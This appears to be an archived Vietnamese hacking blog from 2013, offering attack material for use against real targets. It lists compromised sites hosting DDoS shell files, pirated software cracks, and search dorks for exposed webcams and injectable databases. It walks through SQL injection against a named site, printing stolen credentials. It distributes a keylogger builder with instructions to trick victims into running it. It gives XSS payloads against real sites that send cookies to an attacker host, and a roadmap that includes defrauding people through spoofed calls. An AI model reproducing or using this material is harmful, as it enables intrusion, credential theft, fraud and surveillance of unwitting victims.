Recent post
Archive for tháng 8 2013
* Dưới đây là toàn bộ Shell Boot từ Razer DDOS Ultimate . Nói đúng hơn là toàn bộ sức mạnh của nó nằm ở đây huh :D
http://phim.duoi.net/wp-includes/razer.php
http://phim.duoi.net/wp-includes/razer.php
http://anluc.com.vn/forum/razer.php
http://www.caycanhdatviet.vn/images/razer.php
http://www.xinbangchem.com/users.php
http://angelnailsmontgomery.com/wp-admin/network/razer.php
http://ranjanasind.com/wp-admin/razer.php
http://virtuallyepic.com/storage/images/razer.php
http://nhac.phatca.com/razer.php
http://www.dulichhoabinh.com/wp-content/uploads/razer.php
http://www.dulichhoabinh.com/wp-content/uploads/razer.php
http://www.wallet8.com/users.php
http://www.wallet8.com/users.php
http://freehotlayouts.us/404.php
http://phim.duoi.net/wp-includes/razer.php
http://osraminside.vn/nivo-slider/js/razer.php
http://www.bigsale.net.vn/images/razer.php
http://www.wallet8.com/users.php
http://www.dulichhoabinh.com/wp-content/uploads/razer.php
http://www.owyheeair.com/js/ClientAPITests/pp8.php
http://visualfoodplanner.com/404.php
http://www.dulichhoabinh.com/wp-content/uploads/razer.php
http://khcnhagiang.gov.vn/wins/icon/521/users.php
http://www.owyheeair.com/js/ClientAPITests/pp8.php
http://rqxh.gov.cn/users.php.php
http://dochoithuanthanh.com/images/tintuc/razer.php
http://kaodenuit.free.fr/post.php
http://phim.duoi.net/wp-includes/razer.php
http://inox-master.com/inc/users.php
http://dochoithuanthanh.com/images/tintuc/razer.php
http://www.fptnhatrang.com/images/SanPham/users.php
http://www.dulichhoabinh.com/wp-content/uploads/razer.php
http://www.fptnhatrang.com/images/SanPham/users.php
http://www.fptnhatrang.com/images/SanPham/users.php
http://thammyvienmychi.orv.vn/admin/module/razer.php
http://ruouxuatnhapkhau.com/images/flash/razer.php
http://angelnailsmontgomery.com/wp-includes/js/razer.php
http://angelnailsmontgomery.com/wp-includes/js/razer.php
http://thammyvienmychi.orv.vn/admin/module/razer.php
http://www.fptnhatrang.com/images/SanPham/users.php
http://evresisdiagnostic.com/images/news/razer.php
http://kaodenuit.free.fr/post.php
http://thammyvienmychi.orv.vn/admin/module/razer.php
http://thptlaiuyen.edu.vn/vanban/razer.php
http://www.enter24h.com/components/com_users/helpers/kai/razer.php
http://www.cafezoide.asso.fr/joomla/templates/atomic/razer.php
http://thammyvienmychi.orv.vn/admin/module/razer.php
http://www.appliplast.fr/templates/inspiration-et/razer.php
http://thammyvienmychi.orv.vn/admin/module/razer.php
http://apodiafazzi.internox.com/includes/Archive/razer.php
http://apodiafazzi.internox.com/includes/Archive/razer.php
http://www.veancan.com/libraries/razer.php
http://muabanbdsvang.com/media/razer.php
http://dulichtruyenthong.com/web/images/prod/razer.php
http://www.dulichhoabinh.com/wp-content/uploads/razer.php
http://viet-tech.com.vn/logs/razer.php
http://viet-tech.com.vn/logs/razer.php
http://dulichtruyenthong.com/web/images/prod/razer.php
http://thammyvienmychi.orv.vn/admin/module/razer.php
http://ranjanasind.com/wp-admin/razer.php
http://ranjanasind.com/wp-admin/razer.php
http://phim.duoi.net/wp-includes/razer.php
http://tanaudio.com.vn/users.php
http://tanaudio.com.vn/users.php
http://tanaudio.com.vn/users.php
http://8tube.tk/razer.php
http://tanaudio.com.vn/users.php
http://www.dulichhoabinh.com/wp-content/uploads/razer.php
http://angelnailsmontgomery.com/wp-includes/js/razer.php
http://tanaudio.com.vn/users.php
http://0x534b.blogspot.com
- VPN hẳn ai cũng đã nghe nhưng tôi chưa biết có xài chưa :D . Nhưng thôi cũng tạo điều kiện cho ai muốn xài ^^
- Dưới đây là bảng crack của VPNIUM mới nhất .
Giao diện sau khi crack :
- Trang chủ : http://vpnium.com/
- Download Setup : http://vpnium.com/page/start
Password : vì tôn trọng người làm ra cái này nên mình sẽ giới hạn lại . Các bạn hãy để lại email :)
Please comment your email for password
- Dưới đây là bảng crack của VPNIUM mới nhất .
Giao diện sau khi crack :
- Download Setup : http://vpnium.com/page/start
- Download Cracked : Hide Content
Password : vì tôn trọng người làm ra cái này nên mình sẽ giới hạn lại . Các bạn hãy để lại email :)
Please comment your email for password
- Bộ tools này thực ra tôi cũng crack khá lâu rồi nhưng vì link cũ bị xóa nên tôi post lại bài này cho ai cần nó :)
- 1 số giao diện :
- Trang chủ : http://electronicpromo.net/tool/
- Prince : 5$ -> 10$
- Virus Scan : https://www.virustotal.com/en/file/9fbb2e98207a0c732af7e011b952ed3676e4075af2f6ffd300bce7f0cfcc1c07/analysis/1377065399/
- Password : scriptkiddies
- 1 số giao diện :
- Trang chủ : http://electronicpromo.net/tool/
- Prince : 5$ -> 10$
- Crack File Download : Content Hide
- Virus Scan : https://www.virustotal.com/en/file/9fbb2e98207a0c732af7e011b952ed3676e4075af2f6ffd300bce7f0cfcc1c07/analysis/1377065399/
- Password : scriptkiddies
1. Go to Google and search for "inurl:view/view.shtml" (without quote).
2. Now open any of the link from the search result and enjoy.
3. Below is the list of google dork you can use to see more cams.
2. Now open any of the link from the search result and enjoy.
3. Below is the list of google dork you can use to see more cams.
- inurl:/view.shtml
- intitle:”Live View / - AXIS” | inurl:view/view.shtml^
- inurl:ViewerFrame?Mode=
- inurl:ViewerFrame?Mode=Refresh
- inurl:axis-cgi/jpg
- inurl:axis-cgi/mjpg (motion-JPEG)
- inurl:view/indexFrame.shtml
- inurl:view/index.shtml
- inurl:view/view.shtml
- intitle:start inurl:cgistart
- intitle:”live view” intitle:axis
- liveapplet
- intitle:snc-z20 inurl:home/
- intitle:liveapplet
- intitle:”i-Catcher Console - Web Monitor”
- intitle:axis intitle:”video server”
- intitle:liveapplet inurl:LvAppl
- intitle:”EvoCam” inurl:”webcam.html”
- intitle:”Live NetSnap Cam-Server feed”
- intitle:”Live View / - AXIS”
- intitle:”Live View / - AXIS 206W”
- intitle:”Live View / - AXIS 210″
- inurl:indexFrame.shtml Axis
- intitle:”Live View / - AXIS 206M”
- inurl:”MultiCameraFrame?Mode=Motion”
- allintitle:”Network Camera NetworkCamera”
- intitle:”WJ-NT104 Main Page”
- intext:”MOBOTIX M1″ intext:”Open Menu”
- intext:”MOBOTIX M10″ intext:”Open Menu”
- intext:”MOBOTIX D10″ intext:”Open Menu”
- intitle:”netcam live image”
- intitle:snc-cs3 inurl:home/
- intitle:snc-rz30 inurl:home/
- intitle:”sony network camera snc-p1″
- intitle:”sony network camera snc-m1″
- site:.viewnetcam.com -www.viewnetcam.com
- intitle:”Toshiba Network Camera”
Features:
Multi-platform.
User-friendly graphical interface.
Multithreaded.
Dump.
Customise your queries
Create your custom plugins to automate attacks
User-friendly graphical interface.
Multithreaded.
Dump.
Customise your queries
Create your custom plugins to automate attacks
Supported for today:
POST, GET, Headers (User-Agent, C*****, Referer, X-Forwarded-For, Custom Header …)
MSSQL >=2000 and MySQL>=5.0
MSSQL >=2000 and MySQL>=5.0
Injection methods supported for today:
Error based injection.
Union based injection (using subquery).
Blind (time and boolean based)
Union based injection (using subquery).
Blind (time and boolean based)
enema_fw-1.71-install.exe Windows x86 installer
enema_fw-1.71-source.zip Multiplatform source
enema_fw-1.71-source.zip Multiplatform source
http://code.google.com/p/enema/downloads/list
# | Tên | Chức năng | Tải về |
---|---|---|---|
1 | Acunetix | Read Here | Bấm vào đây |
2 | M-Rootkit | Read Here | Bấm vào đây |
3 | Havij 1.15 | Sql Injection | Bấm vào đây |
4 | Web Vuln Scan | Scan Vuln | Bấm vào đây |
5 | Hidden File Finder | Scan and discover all the Hidden files on your Windows | Bấm vào đây |
6 | Patator v0.5 | Multi-purpose brute-forcer, with a modular design and a flexible usage | Bấm vào đây |
Xin chào, hôm nay tôi sẽ tiếp tục bài viết nói về vấn đề Sql Injection .
I. Sql Injection là gì ?
SQL injection là một kỹ thuật cho phép những kẻ tấn công lợi dụng lỗ hổng của việc kiểm tra dữ liệu đầu vào trong các ứng dụng web và các thông báo lỗi của hệ quản trị cơ sở dữ liệu trả về để inject (tiêm vào) và thi hành các câu lệnh SQL bất hợp pháp, Sql injection có thể cho phép những kẻ tấn công thực hiện các thao tác, delete, insert, update,… trên cơ sỡ dữ liệu của ứng dụng, thậm chí là server mà ứng dụng đó đang chạy, lỗi này thường xãy ra trên các ứng dụng web có dữ liệu được quản lý bằng các hệ quản trị cơ sở dữ liệu như SQL Server, MySQL, Oracle, DB2, Sysbase... ( theo wiki )
Đọc thêm tại : http://vi.wikipedia.org/wiki/SQL_injection , mọi thứ bạn cần đọc về nó đều được ghi cụ thể tại đây nên tôi không nhắc lại nữa.
II. Phương pháp tấn công Sql Injection đơn giản.
- Ở đây tôi sẽ hướng dẫn cụ thể về phương pháp này và bài sau tôi sẽ hướng dẫn vượt mặt bộ lọc kiểm tra !
1. Kiểm tra lỗi
Thường thì để kiểm tra lỗi chúng ta sẽ thêm dấu " ' " sau đường link có dạng ?id= hay ?product= ..vv. nếu giao diện website có thay đổi chúng ta biết rằng nó đã dính Sql .
2. Tìm số trường cột
Để tìm số trường cột ta sử dụng câu lệnh truy vấn Order by [số trường cột] -- -
VD : http://www.abc-consultancy.com/newsitem.php?id=29 order by 10-- - : không có biểu hiện gì hết thử hạ xuống xem như thế nào
http://www.abc-consultancy.com/newsitem.php?id=29 order by 8-- - : cũng không có biểu hiện gì hết hạ tiếp
http://www.abc-consultancy.com/newsitem.php?id=29 order by 7-- - : và chúng ta thấy nội dung đã hiển thị chứng tỏ số trường cột của site là 7
Bắt đầu truy vấn , để xem table nó nằm ở trường cột nào ta sử dụng lệnh Union Select 1,2,3,4,5,6,7-- - với 1,2,3,4,5,6,7 là thứ tự số trường cột ! Ngoài ra trước ?id=29 ta sẽ thêm dấu - để hiện các con số đẹp .
3. Lấy tên table :
Ta thấy có 2 con số hiện ra và chúng ta sẽ truy vấn ở trường cột số 5
Và thông tin table ta thu được :
cms_kladblok,cms_links,mailinglist_1,mailinglist_2,mailinglist_3,mailinglist_4,main,newsletter_defaults,newsletter_letter,pub_dokuman,pub_menu,tapugarantie,users,website_dynpage,website_en_mainmenu_links,website_form,website_mainmenu,website_news,website_nl_mainmenu_links,website_publication
Table này sẽ chứa username và password nhưng chưa chắc luôn là vậy nên chúng ta sẽ xem thử tên column trong table đó là gì
4. Xuất ra Column Username và Password trong table Users
Ta chỉ thay đổi table thành column và thêm and table_name=0x7573657273 ( 0x7573657273 là Users được chuyển từ String sang Hex . Có thể chuyển đổi tại đây : http://string-functions.com/string-hex.aspx )
Thông tin ta thu được : id,sesid,username,password,namesurname,songiris,admin
5. Xuất thông tin Username và Password .
- Tới đây ta lượt bỏ bớt và thay vào đó chỉ còn lại là :
0x2f là ký tự ngăn cách giữa username và password ở đây tôi vẫn chuyển từ string sang hex " / " . Và ta có được : serhatoren/kem07er,Levent/oz07ak,ss/abc07,Burak/abc123
6. Giải mã mật khẩu .
- Tuy nhiên hầu hết các website bây giờ đều mã hóa mật khẩu chủ yếu là MD5 nên các bạn có thể sử dụng các website trâ cứu mật khẩu MD5 như :
Đây là 3 website tôi nghĩ nó giúp ích rất nhiều cho attacker hiện nay :D
Kết thúc ! Bài tiếp theo tôi sẽ tiếp tục hướng dẫn kỹ thuật bypass như XSS !
- Dạo gần đây có nhiều bạn quan tâm đến Keylogger và tôi cũng đang trong quá trình lọc lại máy nên tìm thấy dự án cũ tiện thể build ra cho ai quan tâm :D
Đây chỉ là 1 phiên bản nho nhỏ với 1 vài giải pháp tạm thời tạm ổn đối với ai tập tành bây giờ .
- Giao diện Builder :
Đây chỉ là 1 phiên bản nho nhỏ với 1 vài giải pháp tạm thời tạm ổn đối với ai tập tành bây giờ .
- Giao diện Builder :
- Hướng dẫn sử dụng :
1.Bật VVBuilder.exe sau đó gõ lệnh /START để mở khóa
2.Tiến hành thiết lập gõ lệnh /CONFIG#Your Email#Size Log
3.Bước cuối cùng build stub gõ lệnh /BUILD sau đó nó sẽ tạo ra 1 file có tên vvlogger.exe và nhiệm vụ của bạn là dụ cho victim chạy nó .
Chú thích thêm :
Your Email : bạn nhập email để gởi log về email của bạn
Size Log : vd khi nào file log đủ 100kb nó sẽ tự động gởi bạn có thể tùy chỉnh cho vừa ý
Vd : /CONFIG#vvteam@hotmail.com#100
Bạn sẽ nhận 1 lá thư dạng như thế này :
# | Tên | Phiên bản | Tải về |
---|---|---|---|
1 | VVLogger | Beta | Bấm vào đây |
Password :
- Trong phần thứ nhất XSS là gì ? Cách tìm và khai thác tôi đã nói sơ qua về XSS , trong phần này tôi sẽ giải thích phần còn lại của XSS bao gồm phương pháp thực hiện và phương pháp kiểm tra 1 site dính lỗi XSS
5. 1 số Dork XSS thông dụng :
inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
- Để kiểm tra site có dính lỗi XSS không chúng ta sẽ thử thêm đoạn : <script>alert("Check XSS")</script>
Ví dụ :
http://www.econedlink.org/economic-calendar.php?month=7&day=25%3Cscript%3Ealert%28%22Check%20XSS%20by%20VVidN%22%29%3C/script%3E
- Nhưng không phải lúc nào cũng vậy , một số phương pháp dùng để vượt qua bộ lọc mà tôi sẽ giới thiệu sắp tới sẽ bớt nhàm chán hơn .
- Ngoài ra chúng ta có thể chèn các đoạn HTML sau đó
http://www.econedlink.org/economic-calendar.php?month=7&day=25%22%3E%3Ciframe%20src=%22http://www.vvteam.blogspot.com%22%20height=400%20width=500%20frameborder=1%20align=center%3E%3C/iframe%3E
6. 1 số thao tác tấn công bằng XSS :
- Bạn có thể trỏ về 1 trang Fishing của bạn và làm gì thì tôi không cần nói .
http://www.econedlink.org/economic-calendar.php?month=7&day=25%3Cscript%3Ewindows.location=%22http://yoursite.com%22;%3C/script%3E
- Hoặc bạn có thể rút ngắn link lại bằng cách sử dụng Url Shorter : http://goo.gl/ để tránh victim phát hiện :D
- Đánh cắp Cookies :
http://www.econedlink.org/economic-calendar.php?month=7&day=25<script>document.location='www.yoursite.com/stealer.php?cookie='+escape(document.cookie);</script>
Với www.yoursite.com/stealer.php là nơi bạn sẽ lưu thông tin đánh cắp được !
7. Kỹ thuật vượt mặt bộ lọc :
- Ngoài những phương pháp kể trên , chúng ta phải biết bypass bộ lọc ví dụ như :
http://eastsideshowroom.com/calendar.php?month=5&year=2012%3Cscript%3Ealert%28%22Checked%20by%20VVidN%22%29%3C/script%3ETa thấy nó không hoạt động, vậy thử đổi string sang char thì như thế nào ?
http://eastsideshowroom.com/calendar.php?month=5&year=2012%3Cscript%3Ealert%28String.fromCharCode%2867,%20104,%20101,%2099,%20107,%20101,%20100,%2032,%2098,%20121,%2032,%2086,%2086,%20105,%20100,%2078%29%29%3C/script%3E
Ồ và nó đã vượt qua bộ lọc rồi .
Tất cả những gì bạn cần :
1. Addon Hackbar dùng để hỗ trợ trong việc chuyển đổi string sang char !
2. 1 số site dùng để rút ngắn URL mục đích là lừa victim :
http://tiny.cc/
http://www.shorturl.com/
http://tinyurl.com/
http://goo.gl/
Xin chào , hôm nay tôi sẽ viết 1 bài về XSS , cách khai tác và phòng tránh nó ! Let's go .
Tôi sẽ dựa vào 1 số khái niệm cơ bản từ Blog Soleil để khái quát cho các bạn hiểu !
1. XSS là gì ?
- Định nghĩa XSS được hiểu là CrossSite-Scripting , một kỹ thuật hack web phổ biến nhất hiện nay bằng cách chèn vào các URL, các textbox trong thẻ HTML những đoạn Script nguy hiểm từ đó chiếm quyền điều khiển victim và victim sẽ thực hiện những mệnh lệnh được đưa ra ! Ngoài ra nó cũng là một trong những vấn đề bảo mật của nhà phát triển web và người sử dụng web .
- Những đoạn mã được chèn vào hầu hết được viết bằng Client-Site Script như JavaScript, JScript, DHTML .
2. Nguyên lý hoạt động XSS .
- Khi bạn truy cập vào 1 đường dẫn đã bị chèn mã độc, bạn sẽ gởi gửi các request từ máy client đến server nhằm chèn vào đó các thông tin vượt quá tầm kiểm soát của server từ đó cookies , mật khẩu của bạn được lưu trên trình duyệt sẽ gởi về attacker thông qua Email hay 1 file nào đó trong host đã được thiết lập từ trước hoặc bị cài backdoor , malware, virus vào máy victim hoặc bạn có thể trở thành công cụ tấn công của attacker !
3. Loại XSS.
- Có 2 loại XSS cơ bản :
1. Persistent
2. Non-Persistent Type
- Non-Presistent Type : là loại XSS phổ biến được dùng hiện nay , nó đòi hỏi victim truy cập vào 1 đường dẫn mà attacker đã thiết lập sẵn , khi victim truy cập vào các liên kết đó các đoạn mã độc sẽ thực thi bởi trình duyệt của victim, bạn sẽ hiểu cụ thể hơn dưới ví dụ sau :
Ví dụ :
Đây là đoạn mã sẽ bị chèn XSS !
Ví dụ Presistent XSS Attack :
login.php
home.php
Bây giờ attacker sẽ đăng nhập với quyền User như sau :
- Ăn cắp Cookies
- Cướp session làm việc
- Cài Malware,Virus,backdoor vào máy victim
- Deface Website tuy nhiên nó chỉ nằm ở phần bề mặt của Website chứ không làm thay đổi cấu trúc Website
Đến đây tôi xin tạm dừng và phần tiếp theo tôi sẽ viết tiếp sau khi ngủ dậy :D
Tôi sẽ dựa vào 1 số khái niệm cơ bản từ Blog Soleil để khái quát cho các bạn hiểu !
1. XSS là gì ?
- Định nghĩa XSS được hiểu là CrossSite-Scripting , một kỹ thuật hack web phổ biến nhất hiện nay bằng cách chèn vào các URL, các textbox trong thẻ HTML những đoạn Script nguy hiểm từ đó chiếm quyền điều khiển victim và victim sẽ thực hiện những mệnh lệnh được đưa ra ! Ngoài ra nó cũng là một trong những vấn đề bảo mật của nhà phát triển web và người sử dụng web .
- Những đoạn mã được chèn vào hầu hết được viết bằng Client-Site Script như JavaScript, JScript, DHTML .
2. Nguyên lý hoạt động XSS .
- Khi bạn truy cập vào 1 đường dẫn đã bị chèn mã độc, bạn sẽ gởi gửi các request từ máy client đến server nhằm chèn vào đó các thông tin vượt quá tầm kiểm soát của server từ đó cookies , mật khẩu của bạn được lưu trên trình duyệt sẽ gởi về attacker thông qua Email hay 1 file nào đó trong host đã được thiết lập từ trước hoặc bị cài backdoor , malware, virus vào máy victim hoặc bạn có thể trở thành công cụ tấn công của attacker !
3. Loại XSS.
- Có 2 loại XSS cơ bản :
1. Persistent
2. Non-Persistent Type
- Non-Presistent Type : là loại XSS phổ biến được dùng hiện nay , nó đòi hỏi victim truy cập vào 1 đường dẫn mà attacker đã thiết lập sẵn , khi victim truy cập vào các liên kết đó các đoạn mã độc sẽ thực thi bởi trình duyệt của victim, bạn sẽ hiểu cụ thể hơn dưới ví dụ sau :
Ví dụ :
Đây là đoạn mã sẽ bị chèn XSS !
<?php $name = $_GET['name']; echo "Welcome $name<br>"; echo "<a href="http://yoursite.com/">Click to Download</a>"; ?>Khi chèn XSS sẽ có dạng như sau :
http://yoursite.com/index.php?name=guest<script>alert('VVTeam')</script>- Presistent : trong trường hợp này các đoạn mã độc sẽ được lưu trữ trong database, phương pháp này sẽ làm thay đổi cấu trúc website hiện tại .
Ví dụ Presistent XSS Attack :
login.php
<?php $Host= 'localhost'; $Dbname= 'app'; $User= 'yyy'; $Password= 'xxx'; $Schema = 'test'; $Conection_string="host=$Host dbname=$Dbname user=$User password=$Password"; /* Connect with database asking for a new connection*/ $Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW); /* Error checking the connection string */ if (!$Connect) { echo "Database Connection Failure"; exit; } $query="SELECT user_name,password from $Schema.members where user_name='".$_POST['user_name']."';"; $result=pg_query($Connect,$query); $row=pg_fetch_array($result,NULL,PGSQL_ASSOC); $user_pass = md5($_POST['pass_word']); $user_name = $row['user_name']; if(strcmp($user_pass,$row['password'])!=0) { echo "Login failed"; } else { # Start the session session_start(); $_SESSION['USER_NAME'] = $user_name; echo "<head> <meta http-equiv=\"Refresh\" content=\"0;url=home.php\" > </head>"; } ?>
home.php
<?php session_start(); if(!$_SESSION['USER_NAME']) { echo "Need to login"; } else { $Host= 'localhost'; $Dbname= 'app'; $User= 'yyy'; $Password= 'xxx'; $Schema = 'test'; $Conection_string="host=$Host dbname=$Dbname user=$User password=$Password"; $Connect=pg_connect($Conection_string,$PGSQL_CONNECT_FORCE_NEW); if($_SERVER['REQUEST_METHOD'] == "POST") { $query="update $Schema.members set display_name='".$_POST['disp_name']."' where user_name='".$_SESSION['USER_NAME']."';"; pg_query($Connect,$query); echo "Update Success"; } else { if(strcmp($_SESSION['USER_NAME'],'admin')==0) { echo "Welcome admin<br><hr>"; echo "List of user's are<br>"; $query = "select display_name from $Schema.members where user_name!='admin'"; $res = pg_query($Connect,$query); while($row=pg_fetch_array($res,NULL,PGSQL_ASSOC)) { echo "$row[display_name]<br>"; } } else { echo "<form name=\"tgs\" id=\"tgs\" method=\"post\" action=\"home.php\">"; echo "Update display name:<input type=\"text\" id=\"disp_name\" name=\"disp_name\" value=\"\">"; echo "<input type=\"submit\" value=\"Update\">"; } } } ?>
Bây giờ attacker sẽ đăng nhập với quyền User như sau :
<a href=# onclick=\"document.location=\'http://remotesite.com/xss.php?c=\'+escape\(document.cookie\)\;\">VVTeam</a>Khi victim truy cập vào hệ thống , victim sẽ thấy 1 user có tên : VVTeam trùng với tên dùng khác , Victim sẽ nhấp vào liên kết ấy nó sẽ gởi cookies , Session ID đến website của attacker ! Ngay lúc đó attacker có thể gởi các yêu cầu đến website và đăng nhập với quyền là Admin dựa vào các Session ID cho đến khi nó hết hạn !
xss.php?c=PHPSESSID%3Dvmcsjsgear6gsogpu7o2imr9f34. Mức độ nguy hiểm của XSS :
- Ăn cắp Cookies
- Cướp session làm việc
- Cài Malware,Virus,backdoor vào máy victim
- Deface Website tuy nhiên nó chỉ nằm ở phần bề mặt của Website chứ không làm thay đổi cấu trúc Website
Đến đây tôi xin tạm dừng và phần tiếp theo tôi sẽ viết tiếp sau khi ngủ dậy :D
#1 Updated 15/8/2013 :
inurl:/cpage.php?pt=#2 Updated 15/8/2013 :
inurl:/cemeteryRecords.php?cid=
“Design by Webworx Design Group using EasyNetSites.com”
Demo :
http://www.isbgfh.org/cpage.php?pt=7
http://www.fgs.org/cpage.php?pt=43
http://www.infouga.org/cpage.php?pt=11
inurl:group_concat username 0x3a PASSWORD from robot
inurl:group_concat username 0x3a PASSWORD from pirates
inurl:group_concat username 0x3a PASSWORD from obama
inurl:group_concat username 0x3a PASSWORD from shadow
inurl:group_concat username 0x3a PASSWORD from khan
inurl:group_concat username 0x3a PASSWORD from paul
inurl:group_concat username 0x3a PASSWORD from pakistan
inurl:group_concat username 0x3a PASSWORD from hacker
inurl:group_concat username 0x3a PASSWORD from users
inurl:group_concat username 0x3a PASSWORD from adm
inurl:group_concat username 0x3a PASSWORD from admin
inurl:group_concat username 0x3a PASSWORD from user
inurl:concat username 0x3a password from sysibm.sysdummy1
inurl:concat username 0x3a password from israel
inurl:concat username 0x3a password from mr.bean
inurl:concat username 0x3a password from sysuser
inurl:concat username 0x3a password from sysadmin
inurl:/MyBB/Upload/inc/
inurl:db_mysql.php
inurl:sql.php?table=wp_users
inurl:sql.php?table=group
inurl:sql.php?table=phpMyAdmin
inurl:sql.php?table=users
inurl:sql.php?table=login
inurl:/phpMyAdmin/sql.php
inurl:sql.php?table=customer
inurl:sql.php?table=member
inurl:sql.php?table=account
inurl:sql.php?table=admin
inurl:sql.php?table=tblwhoislog
inurl:/usr/local/apache/htdocs
inurl:sql.php?table=jos_users
inurl:sql.php?table=mybb_users
inurl:sql.php?table=log
inurl:sql.php?table=pass
inurl:sql.php?table=information_schema
inurl:sql.php?table=proxies_priv
inurl:sql.php?table=mysql.user
inurl:sql.php?table=collection
inurl:sql.php?table=loginlog
inurl:sql.php?table=menu
inurl:sql.php?table=setting
inurl:sql.php?table=phpbb_users
inurl:/phpmyadmin/sql.php?db=mysql&sql_query=
inurl:union+select+filetype:asp
inurl:union+select+filetype:php
inurl:union+select+filetype:cfm
inurl:union 4.1.22-standard-log
inurl:union 5.0.67-log
inurl:union» 4.1.22-log
inurl:union 5.0.32
inurl:union» 5.0.67
inurl:union» 5.0.51a-3ubuntu5
inurl:union» 5.1.63-cll
inurl:bootstrap.php
inurl:Host:+filetype:sql
inurl:phpMyAdmin running on localhost -- phpMyAdmin 2.5.7-pl1
1. Learn TCP/IP, Basic Information gathering, Proxies, Socks, SSL, VPN, VPS, RDP, FTP, POP3, SMTP, Telnet, SSH.
2. Learn Linux, Unix, Windows - You can do this using vmware or any virtual desktop utility.
3. Learn a programming language that's compatible with all OS - Perl, Python, C, ASM
4. Learn HTML, PHP, Javascript, ASP, XML, SQL, XSS, SQLI, RFI, LFI
5. Learn Reverse engineering and crack some programs for serials easy ones like mirc, winzip, winrar or old games.
6. Code a fuzzer for common protocols - ftp, pop3, 80, 8080 - Pick some free software like ftp server, mail server, apache or iis webserver or a webserver all-in-one pack, or teamspeak, ventrilo, mumble.
7. Code a tool that uses grep to sort out unique code in source codes.
8. Make a custom IPtable, IPsec firewall that blocks all incoming traffic and out going traffic and add filters to accept certain ports that your software or scripts use.
9. Pick a kernel in linux or unix, also pick a Microsoft OS version lets say Winxp pro sp2 put them on the virtual desktops (vmware) and find and code a new local exploit in those versions, then install a Apache webserver on the Linux/Unix and a IIS webserver on the winxp pro and attempt to find and code a new local reverse_tcp_shell exploit.
10. Learn Cisco Router and Switch configuration and setup.
11. Learn Checkpoint Setup and Config
12. Learn Wifi scanning, cracking, sniffing.
13. Pick a person in you phonebook for the area code you live in or city then ring the person on a anonymous line like skype or a payphone or a carded sim and attempt to social engineer the person for his name, address, data of birth, city born, country born, ISP connected with, Phone company connected with, What bank he/she uses and anything else you can get. Then Attempt to ring using a spoof caller ID software with the person's phone number - call the ISP and try reset the password to his/her internet connection/web-mail, get access to bank account or ask them to send out a new *** to a new address (drop) with a new pin, reset of phone company passwords.
14. Use your information gathering skills to get all the information off a website like a shop then use the spoof caller-id software or hack your phone to show a new number of the Webserver's Tech Support number then ring the shop owner and try get the shop site password.
15. Do the same thing but attempt to use a web attack against a site or shop to gain admin access.
16. Once got access upload a shell and attempt to exploit the server to gain root using a exploit you coded not someone else s exploit.
17. Make your own Linux Distro
18. Use your own Linux Distro or use a vanilla Linux gnome (not kde) keep it with not much graphics so you can learn how to depend on the terminal and start from scratch install applications that you will only need for a blackbox (Security test box), make folders for fuzzers, exploits, scanners..etc Then load them up with your own scripts and other tools ( By this stage you shouldn't need to depend on other peoples scripts).
19. Learn macosx and attempt to gain access to a Macosx box whether it be your own or someone's else.
20. Create a secure home network and secure your own systems with your own Security policies and firewall settings.